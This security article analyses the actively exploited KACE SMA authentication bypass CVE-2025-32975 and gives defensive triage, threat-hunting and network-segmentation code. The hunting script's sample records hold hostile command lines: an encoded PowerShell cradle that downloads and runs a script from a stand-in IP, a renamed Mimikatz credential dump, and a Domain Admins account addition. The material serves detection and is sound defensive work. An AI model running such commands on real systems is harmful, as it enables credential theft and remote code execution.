The research for this article draws on Arctic Wolf’s incident report, the Seralys security advisory, and Quest’s own patching bulletin.


What’s New This Week

Arctic Wolf published confirmed incident data on 19 March 2026 showing attackers who gained initial access via CVE-2025-32975 subsequently achieved domain controller access and reached backup infrastructure including Veeam and Veritas systems. The attack chain is more complete than initial reports suggested, and the targeting of backup systems is a significant escalation indicator.


Changelog

Date          Summary
23 Mar 2026   Initial publication.

CVE-2025-32975 is being actively exploited right now. The patch has been available since May 2025. That ten-month gap is the whole story.

Quest KACE Systems Management Appliance is enterprise infrastructure. If you work in a mid-to-large organisation with Windows endpoints, there is a reasonable chance KACE or something very like it is managing those machines. It handles software deployment, patch management, endpoint inventory, and remote monitoring. Agents run on every managed machine, phoning home to the central appliance. The SMA is the hub. Every endpoint is a spoke.

The Vulnerability

CVE-2025-32975 is an authentication bypass in the appliance's SSO handling. Classified under CWE-287 (Improper Authentication), it lets an unauthenticated attacker impersonate a legitimate user without holding valid credentials. The flaw requires no prior access and no user interaction, and it is exploitable over the network. Hence the CVSS score of 10.0, the maximum possible.

CVSS 10.0 is not common. Under CVSS v3 it requires every base metric to sit at its worst value at once: network attack vector, low complexity, no privileges, no user interaction, and high impact on confidentiality, integrity, and availability. Even that combination only reaches 9.8; the last step to 10.0 is Scope: Changed, meaning the compromise reaches beyond the vulnerable component itself, which for an appliance that pushes software to every managed endpoint is precisely the concern. There are no partial marks here. Researchers at Seralys discovered the vulnerability and disclosed it in June 2025, by which point Quest had already shipped a fix.

Affected versions span the 13.x and 14.x branches:

  • 13.0.x before 13.0.385
  • 13.1.x before 13.1.81
  • 13.2.x before 13.2.183
  • 14.0.x before 14.0.341 (Patch 5)
  • 14.1.x before 14.1.101 (Patch 4)

The fix has been available since May 2025. Organisations that applied it are not vulnerable. Organisations that did not are exposed.
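As an added example (not from Quest, Seralys or Arctic Wolf), the following Python triages a fleet's reported SMA version strings against the fixed builds listed above. The inventory records are constructed. It deliberately refuses to call a version safe when its branch does not appear in the advisory at all (a 12.x appliance, say), since absence from the list is not evidence of a fix, and it ranks internet-facing vulnerable appliances first because those are the ones the March 2026 activity targeted.

```python
"""Triage KACE SMA version strings against the first fixed build per branch.

Added example; the inventory below is constructed, not a real estate.
"""
import re

# First fixed build for each affected branch, as listed in the advisory text above.
FIXED = {
    (13, 0): (13, 0, 385),
    (13, 1): (13, 1, 81),
    (13, 2): (13, 2, 183),
    (14, 0): (14, 0, 341),   # shipped as "14.0.341 (Patch 5)"
    (14, 1): (14, 1, 101),   # shipped as "14.1.101 (Patch 4)"
}

# Quest reports versions as "major.minor.build", optionally followed by "(Patch N)".
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:\s*\(Patch\s*\d+\))?$", re.I)

# Sort order for the triage output: exposed and vulnerable first.
PRIORITY = {"P1": 0, "P2": 1, "review": 2, "ok": 3}


def parse_version(text: str) -> tuple:
    """Return (major, minor, build) or raise ValueError on an unrecognised string."""
    match = VERSION_RE.match(text.strip())
    if not match:
        raise ValueError(f"unrecognised KACE SMA version string: {text!r}")
    return tuple(int(part) for part in match.groups())


def assess(version: str) -> str:
    """Classify one version as 'patched', 'vulnerable' or 'unknown_branch'.

    A branch the advisory does not list is NOT treated as safe: it may be an
    unsupported release the vendor never evaluated, so it needs a human look.
    """
    major, minor, build = parse_version(version)
    fixed = FIXED.get((major, minor))
    if fixed is None:
        return "unknown_branch"
    return "patched" if (major, minor, build) >= fixed else "vulnerable"


def triage(inventory: list) -> list:
    """Annotate each appliance with status and priority, most urgent first.

    inventory items: {"appliance": str, "version": str, "internet_facing": bool}
    """
    rows = []
    for item in inventory:
        status = assess(item["version"])
        if status == "vulnerable":
            priority = "P1" if item["internet_facing"] else "P2"
        elif status == "unknown_branch":
            priority = "review"
        else:
            priority = "ok"
        rows.append({**item, "status": status, "priority": priority})
    return sorted(rows, key=lambda row: PRIORITY[row["priority"]])


# Constructed sample inventory (hostnames, versions and exposure are invented).
SAMPLE_INVENTORY = [
    {"appliance": "sma-hq-01",  "version": "14.1.101 (Patch 4)", "internet_facing": False},
    {"appliance": "sma-dmz-01", "version": "14.0.339",           "internet_facing": True},
    {"appliance": "sma-lab-02", "version": "13.0.383",           "internet_facing": False},
    {"appliance": "sma-legacy", "version": "12.1.169",           "internet_facing": False},
]


if __name__ == "__main__":
    for row in triage(SAMPLE_INVENTORY):
        print(f"{row['priority']:<7}{row['appliance']:<12}{row['version']:<22}{row['status']}")
```

Feed it the version column from whatever inventory you keep of appliances; anything that comes back P1 is the exact configuration the incidents in this article started from.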

Why CVSS 10.0 Is Different

Most exploited vulnerabilities require something from the attacker – a phished credential, an authenticated session, adjacent network access, a specific software configuration. CVSS 10.0 means none of that applies. An attacker with internet access to the appliance can begin exploiting it immediately.

The practical implication is that internet-facing KACE SMA instances can be compromised trivially. You do not need nation-state capabilities. You need a network scanner and the exploit.

Arctic Wolf’s telemetry shows exploitation activity beginning the week of 9 March 2026, targeting KACE SMA instances publicly exposed to the internet. The firm noted at the time of its report that no public proof-of-concept had been identified, which suggests the actors exploiting this are working from private research, from knowledge of the vulnerability class, or from diffing the patched and unpatched releases, which have sat side by side since May 2025. Given the disclosure timeline, with the vulnerability publicly documented in June 2025, nine months is ample time for independent rediscovery.

The Management Plane Problem

Here is the part that should concern security teams more than the CVSS score.

KACE SMA is not a productivity tool. It is an administrative control plane. Compromising it does not give an attacker access to one machine. It gives them the ability to push software and commands to every machine the appliance manages.

Arctic Wolf’s incident data makes this concrete. Observed post-exploitation activity included:

  • Remote command execution via KACE’s KPluginRunProcess functionality
  • Credential harvesting using Mimikatz (in one case disguised as asd.exe)
  • Enumeration of domain administrators, domain controllers, and logged-in users
  • RDP access to domain controllers
  • RDP access to backup infrastructure: Veeam and Veritas systems
  • Creation of additional administrative accounts with domain admin privileges
  • PowerShell execution with -ExecutionPolicy Bypass and -WindowStyle Hidden flags

The attacker did not stop at KACE. They walked from the management appliance to the domain controllers and then to the backup systems. Backup systems are the recovery safety net. Reaching them is how ransomware attacks become catastrophic rather than merely bad.

This is the management plane pattern. Security teams spend substantial effort hardening endpoints: EDR coverage, application whitelisting, logging pipelines, vulnerability scanning. That investment is sound. But the tool that manages all those endpoints – the one with agents on every machine, with administrative credentials cached in its database, with the ability to push arbitrary scripts to the entire estate – often receives less attention. It is infrastructure. It is boring. It does not make the threat model presentations.

KACE had a patch available for ten months. Organisations that were exploited in March 2026 were running unpatched versions of management software that was internet-facing. That combination should not have been possible.

What to Do

Patch immediately. The fixed versions are documented above. Quest shipped fixes for the 13.0, 13.1 and 13.2 branches as well, three older release branches beyond its standard support window, so running an out-of-support branch is not a reason to wait. If your KACE SMA is in any affected branch, update it, and confirm the reported version afterwards rather than trusting that the update applied.

Remove internet exposure. KACE SMA should not be directly accessible from the public internet. If remote access is required, route it through a VPN. A management appliance with a public IP and no effective authentication – which is the practical state of a CVSS 10.0 auth bypass – is not a defensible configuration.

Audit for indicators of compromise. If you are running an affected version and it has been internet-accessible, assume potential compromise and investigate. Look for: unexpected administrative accounts, unusual PowerShell execution (particularly with bypass flags), Base64-encoded payloads in KACE logs, outbound connections to unfamiliar infrastructure, and unexpected RDP sessions to domain controllers or backup systems. Do not hunt for credential-dumping tools by file name alone: in one observed case Mimikatz ran as asd.exe, so match on command-line arguments and on access to LSASS instead.
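The hunt above is easier to run consistently as code. The Python below is an added example, not part of the Arctic Wolf report or of KACE; it scans exported process command lines (Sysmon event 1, Security event 4688, or script-execution entries from KACE's logs) for the flags and tradecraft the report lists. The records are constructed. Two details it gets right that an ad hoc grep often misses: PowerShell -EncodedCommand payloads are base64 over UTF-16LE, not UTF-8, so they must be decoded that way before the download cradle inside becomes visible; and a renamed Mimikatz (asd.exe in one observed case) still betrays itself through its module syntax (privilege::, sekurlsa::) on the command line even though the file name says nothing.

```python
"""Hunt exported process command lines for the post-exploitation tradecraft
described above (bypass/hidden PowerShell, encoded payloads, Mimikatz module
syntax, domain-admin account manipulation).

Added example; the log records below are constructed, not real telemetry.
"""
import base64
import binascii
import re

# powershell.exe accepts any unambiguous parameter prefix, so match the common
# abbreviations as well as the full switch names. Not exhaustive.
EXEC_BYPASS = re.compile(r"-(?:executionpolicy|exec|ep)\s+bypass", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
ENCODED_CMD = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# Mimikatz module syntax survives renaming the binary, so key on arguments,
# not on the executable name.
MIMIKATZ_MODULES = re.compile(r"(?:sekurlsa|lsadump|privilege|kerberos)::\w+", re.I)

# Local account creation or addition to Domain Admins via net.exe / AD cmdlets.
ACCOUNT_ABUSE = re.compile(
    r'net1?\s+(?:user\s+\S+\s+\S+\s+/add|group\s+"?domain admins"?\s+\S+\s+/add)'
    r"|add-adgroupmember",
    re.I,
)

# Download-and-execute cradles commonly hidden inside encoded commands.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string", re.I
)


def decode_encoded_command(b64: str):
    """Decode a -EncodedCommand argument. PowerShell encodes UTF-16LE, not UTF-8;
    decoding as UTF-8 yields NUL-interleaved garbage and the cradle is missed.
    Returns None when the argument is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze(cmdline: str) -> list:
    """Return finding tags for one command line (empty list when nothing matches)."""
    findings = []
    if EXEC_BYPASS.search(cmdline):
        findings.append("ps_execution_policy_bypass")
    if HIDDEN_WINDOW.search(cmdline):
        findings.append("ps_hidden_window")
    encoded = ENCODED_CMD.search(cmdline)
    if encoded:
        findings.append("ps_encoded_command")
        decoded = decode_encoded_command(encoded.group(1))
        if decoded and DOWNLOAD_CRADLE.search(decoded):
            findings.append("download_cradle_in_encoded_payload")
    if MIMIKATZ_MODULES.search(cmdline):
        findings.append("mimikatz_module_syntax")
    if ACCOUNT_ABUSE.search(cmdline):
        findings.append("admin_account_manipulation")
    return findings


def hunt(records: list) -> list:
    """Return only the records that produced findings, with the tags attached."""
    hits = []
    for record in records:
        findings = analyze(record["cmd"])
        if findings:
            hits.append({"host": record["host"], "cmd": record["cmd"], "findings": findings})
    return hits


def _encode(ps: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell does (UTF-16LE base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed records: hostnames, IP and file paths are invented for illustration.
SAMPLE_RECORDS = [
    {"host": "WS-0142", "cmd": "powershell.exe -ep bypass -w hidden -enc "
        + _encode("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/k.ps1')")},
    {"host": "WS-0142", "cmd": 'C:\\Windows\\Temp\\asd.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"host": "DC01",    "cmd": 'net group "Domain Admins" svc_bkp2 /add /domain'},
    {"host": "WS-0007", "cmd": "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\ProgramData\\inventory.ps1"},
]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_RECORDS):
        print(hit["host"], ", ".join(hit["findings"]))
```

The benign fourth record (a signed inventory script run with RemoteSigned) produces no findings, which is the point of matching on specific flags rather than on every PowerShell launch. Review of RDP logons (Security event 4624, logon type 10) to domain controllers and backup servers is a separate query against the event log and is not covered here.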

Segment the management plane. Even after patching, the management network should not be flat. KACE, SCCM, Intune connectors, SIEM forwarders, RMM agents – none of these should have unrestricted lateral movement paths to production systems. Network segmentation is not just about limiting blast radius when an endpoint is compromised. It is about limiting blast radius when the management tool is compromised.
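Removing internet exposure and segmenting the management plane, as the two points above describe, come down to the same rule set on the gateway between the management VLAN and everything else. The nftables ruleset below is an added example, not Quest's or Arctic Wolf's configuration; the SMA is a vendor appliance, so the policy lives on the network, not on the box. Addresses, the jump-host and tier-0 sets, and the agent port are assumptions (52230 is used here as the KACE agent messaging port; confirm it against the documentation for your version). The design point is that the appliance can reach its agents, LDAP and DNS on the domain controllers, and nothing else: the RDP path from appliance to domain controller or backup server that the incident data describes is logged and dropped.

```nft
#!/usr/sbin/nft -f
# Added example ruleset for the gateway in front of the KACE SMA.
# Addresses, sets and the agent port (52230) are assumptions for illustration.
define SMA        = 10.10.5.20
define ENDPOINTS  = 10.20.0.0/16
define AGENT_PORT = 52230

table inet mgmt_plane {
    set admin_jump_hosts {
        # The only sources allowed to reach the admin console on 443.
        type ipv4_addr
        elements = { 10.10.1.10, 10.10.1.11 }
    }
    set domain_controllers {
        type ipv4_addr
        elements = { 10.10.2.10, 10.10.2.11 }
    }
    set backup_servers {
        # Veeam / Veritas hosts: the appliance has no business talking to them.
        type ipv4_addr
        elements = { 10.10.3.50, 10.10.3.51 }
    }

    chain forward {
        type filter hook forward priority 0; policy drop;
        ct state established,related accept
        ct state invalid drop

        # Admin console: jump hosts only. A public IP never matches this rule.
        ip daddr $SMA ip saddr @admin_jump_hosts tcp dport 443 accept

        # Agent check-in from the endpoint ranges only.
        ip daddr $SMA ip saddr $ENDPOINTS tcp dport { 443, $AGENT_PORT } accept

        # Egress from the appliance: push to agents, DNS and LDAP to the DCs.
        ip saddr $SMA ip daddr $ENDPOINTS tcp dport $AGENT_PORT accept
        ip saddr $SMA ip daddr @domain_controllers udp dport 53 accept
        ip saddr $SMA ip daddr @domain_controllers tcp dport { 53, 389, 636 } accept

        # Anything else from the appliance to tier-0 is the lateral movement in
        # the incident report (RDP, SMB, WinRM): count it, log it, alert on it.
        ip saddr $SMA ip daddr @domain_controllers counter log prefix "sma-to-dc " drop
        ip saddr $SMA ip daddr @backup_servers counter log prefix "sma-to-backup " drop

        counter log prefix "mgmt-plane-drop " drop
    }
}
```

Load it with `nft -f` on the gateway and watch the two tier-0 counters; they should stay at zero, and a non-zero value during an incident tells you the appliance was used as a pivot.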

The Broader Pattern

Management tooling is a category in which patching urgency is consistently underweighted relative to the actual risk profile.

The argument usually goes: “We cannot patch KACE right now – it manages our entire estate, and if something goes wrong with the update we will have a worse problem than the CVE.” That reasoning inverts the risk. An unpatched management appliance with a CVSS 10.0 auth bypass that is internet-facing is not a theoretical risk. It is an active exploit target. The update risk is recoverable. A domain-wide compromise with backup infrastructure in attacker hands may not be.

The same logic applies across the category. SCCM, ConnectWise, Kaseya, Datto, SolarWinds – management and monitoring tools have historically been high-value targets precisely because they combine wide access, high trust, and lower-than-average patch velocity. Attackers have understood this for years. Security teams need to weight management plane patching at least as highly as endpoint patching, not below it.

One server. Every machine it manages. That is the leverage. CVE-2025-32975 is not the last time this pattern will be exploited.